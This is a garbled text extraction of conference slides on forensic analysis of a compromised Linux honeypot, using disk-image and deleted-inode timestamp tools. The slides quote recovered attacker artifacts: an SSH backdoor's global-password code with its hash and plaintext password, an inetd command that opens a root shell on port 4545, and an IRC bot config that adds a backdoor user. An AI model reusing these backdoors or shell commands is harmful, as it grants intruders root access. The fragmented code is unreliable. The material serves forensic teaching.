1、Jump to first pageCanSecWest 01Digging Through Compromised Systems and Tracking IntrudersDave DittrichComputing unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6 donehda1hda5# ./configure -enable-global=d33e8f1a6397c6d2efd9a2aae748eb02-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. .
2、 . / “d33e8f1a6397c6d2efd9a2aae748eb02“;#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“ . . .echo “running $CONFIG_SHELL-/bin/sh ./configure-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. . .$ac_eAUSE_GLOBAL_PASS$ac_eBUSE_GLOBAL_PASS$ac_eC“d33e8f1a6397c6d2efd9a2aae748eb02“$ac_e
3、Dd33e8f1a6397c6d2efd9a2aae748eb02hda6hda7hda8Jump to first pageDeleted i-node timestamp analysis# grave-robber -c /t -m -d . -o LINUX2# for i in 1 5 6 7 8 do ils honeypot.hda$i | ils2mac hda$i.ilsbody done# ls -l *body-rw-r-r- 1 root root 3484454 Feb 15 23:01 body-rw-r-r- 1 root root 207 Feb 17 14:4
4、2 hda1.ilsbody-rw-r-r- 1 root root 179650 Feb 17 14:42 hda5.ilsbody-rw-r-r- 1 root root 207 Feb 17 14:42 hda6.ilsbody-rw-r-r- 1 root root 796 Feb 17 14:42 hda7.ilsbody-rw-r-r- 1 root root 12618 Feb 17 14:42 hda8.ilsbody# cat hda?.ilsbody body-deleted# cat body body-deleted body-full# mactime -p /t/e
5、tc/passwd -g /t/etc/group -b body-full 11/06/2000 mactime.txtJump to first pageDeleted i-nodesAug 09 00 12:52:37 18698240 m -rw-r-r- 1010 users Nov 08 00 06:52:59 18698240 .a. -rw-r-r- 1010 users Nov 08 00 06:56:08 18698240 c -rw-r-r- 1010 users Jump to first pageRecovered source#ifdef USE_GLOBAL_PA
6、SS/* Check if the “global“ password was entered */int check_global_passwd( unsigned char *pass )/* Paste here the output from md5sum -string=“Your_Password“ */ char md5passwd33=USE_GLOBAL_PASS;/ “3e3a378c63aa1e55e3e9ae9d2bdcd6a1“; struct MD5Context md;unsigned char md5buffer32; int i;/* Compute the
7、response. */ MD5Init(MD5Update( MD5Final(md5buffer, for( i = 15; i = 0; i- ) md5bufferi*2+1 = (md5bufferi md5bufferi*2 = (md5bufferi 4) + 0;Jump to first pageConfirmation of backdoor password#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“# md5sum -string=tw1Lightz0ned33e8f1a6397c6d2efd9a2
8、aae748eb02 “tw1Lightz0ne“Jump to first pageCommand line in swap spacerootapollo linux# ./dd bs=1024 DEEFFGG08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000. . .F* FF+, NV1/bin/sh -c e
9、cho 4545 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetdNov 8 04:02:00 apollo anacron2159: Updated timestamp for job cron.daily Techniques by Wietse Venema and Peter KosinarJump to first pageContents of IRC bot config file# tPACK.tcl coded by T0R0 - - www.falcon- #set homech
10、an “#tpack“set admin “TORO X-cess“set vers “2.3“set altnick “$nick-“set username “$nick“set realname “www.$“set userfile “.log.yesterday“set channel-file “.log.today“. . .proc dcc_flags handle idx arg set a lindex $arg 0 set z decrypt xx3fw3 bijph.s5f7N0if $handle = $z set p “decrypt f3qcadr3 DtVgR.
11、E/mLu1“if $a = $p if !validuser $z adduser $z *!*torowill.fuck.for.an.o-line.st chpass $z temp123 . . .Jump to first pageDecryption (part 1)egg.log6692 set z decrypt xx3fw3 bijph.s5f7N0 TORO6694 set p “decrypt f3qcadr3 DtVgR.E/mLu1“ die06769 set p “decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/“ reset07116 de
12、crypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1 decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj. decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq. decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzYz0yt0 decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20 bind chon - * on_dcc7328 set wmail “decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1“ Technique by Marco Walther
